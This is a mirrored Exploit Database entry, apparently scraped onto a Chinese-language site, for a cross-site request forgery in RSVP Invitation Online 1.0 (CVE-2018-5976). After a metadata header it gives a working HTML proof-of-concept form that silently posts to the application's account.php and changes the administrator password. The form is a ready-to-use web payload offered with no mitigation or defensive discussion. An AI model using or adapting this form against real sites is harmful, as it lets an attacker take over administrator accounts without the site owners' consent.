RSVP Invitation Online 1.0 – Cross-Site Request Forgery (Update Admin)

• Exploit Database
• 19 阅读

• 作者： Ihsan Sencan
  日期： 2018-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43862/

• <!--
  # # # # # 
  # Exploit Title: RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin Pass)
  # Dork: N/A
  # Date: 23.01.2018
  # Vendor Homepage: http://putrazendrato.link/
  # Software Link: https://www.codegrape.com/item/rsvp-invitation-online/3890
  # Demo: http://putrazendrato.link/rsvp/login.php
  # Version: 1.0
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: CVE-2018-5976
  # # # # #
  # Exploit Author: Ihsan Sencan
  # Author Web: http://ihsan.net
  # Author Social: @ihsansencan
  # # # # #
  # 
  # Proof of Concept:
  # 1)
  -->
  <html>
  <body>
  <form method="post" action="http://localhost/rsvp/function/account.php">
  <!--Change admin pass-->
  <input name="newpassword" type="text" value="efe">
  <!--Change admin pass confirm-->
  <input name="confirm" type="text" value="efe">
  <input type="submit" name="Submit" value="Update">
  </form>
  </body>
  </html>